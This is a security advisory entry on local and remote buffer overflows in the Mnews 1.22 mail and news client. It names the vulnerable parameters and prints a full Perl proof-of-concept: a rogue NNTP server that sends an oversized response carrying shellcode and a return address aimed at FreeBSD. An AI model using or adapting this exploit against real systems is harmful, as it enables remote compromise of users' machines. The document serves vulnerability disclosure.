COMMAND

	Mnews local and remote overflow vulnerabilities

SYSTEMS AFFECTED

	version 1.22, maybe older too

PROBLEM

	zillion  [http://www.snosoft.com]  found  following,  as   reported   in
	Strategic Reconnaissance Team Security Advisory (SRT2002-04-31-1159):
	

	Mnews is a small console based email and  news  client  which  is  often
	installed setgid mail. Several local  and  remote  overflows  have  been
	identified in this package.
	

	Local overflows where found in the -f, -n, -D, -M, -P parameters and  in
	the  JNAMES,  MAILSERVER  environment  variables.  The  remote  overflow
	resides in the code responsible for processing responses  received  from
	the NNTP server. For example the following response will  result  in  an
	overflow:
	

	

	 200 <a x 770>

	

	

	If you look at the source code of mnews you will see that  this  package
	is very outdated and dangerous to use on todays Internet.
	

	 Impact

	 ======

	

	Local users might be able to elevate their privileges  on  the  affected
	systems. Remote malicious server owners can use mnews  to  penetrate  an
	affected system.
	

	

	 Proof of Concept

	 ================

	

	

	#!/usr/bin/perl -w

	#

	# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped

	# with the 4.5-RELEASE ports collection.

	#

	# This exploit is pretty harmless as it only prints a small message to

	# stdout (NAI?).

	#

	# Written by zillion[at]safemode.org (!shit)

	#

	# http://www.safemode.org

	# http://www.snosoft.com

	

	use IO::Socket;

	

	$shellcode =

	

	        \"\\xeb\\x21\\x5e\\x31\\xc0\\x31\\xdb\\xb3\\x3c\\x80\\xeb\\x32\\x88\\x1e\\x88\".

	        \"\\x5e\\x14\\x6a\\x15\\x56\\x6a\\x01\\xb0\\x04\\x50\\xcd\\x80\\x31\\xc0\\x50\".

	        \"\\xb0\\x01\\x50\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x23\\x57\\x61\\x73\\x73\".

	        \"\\x73\\x73\\x75\\x70\\x70\\x70\\x70\\x70\\x20\\x21\\x21\\x20\\x3f\\x3f\\x3f\".

	        \"\\x23\";

	

	# normal \\x90 nops don\'t work here..

	

	$nop = \"A\";

	$esp = 0xbfbff65e;

	$off = \"-70\";

	$size = 762;

	

	for ($i = 0; $i < ($size - length($shellcode)); $i++) {

	    $buffer .= \"$nop\";

	}

	

	$buffer .= $shellcode;

	$buffer .= pack(\'l\', ($esp + $off));

	$buffer .= pack(\'l\', ($esp + $off));

	

	printf(\"Starting to listen for incoming connections... buffer size

	%d\\n\",length($buffer));

	print(\"The new return address: 0x\", sprintf(\'%lx\',($esp + $off)), \"\\n\");

	

	my $sock = new IO::Socket::INET (

	                                 LocalPort => 119,

	                                 Proto => \'tcp\',

	                                 Listen => 1,

	                                 Reuse => 1,

	                                );

	

	while($cl = $sock->accept()) {

	

	sleep 1;

	print $cl \"200 $buffer\\n\";

	sleep 3;

	

	}

	

SOLUTION

	Stop using Mnews.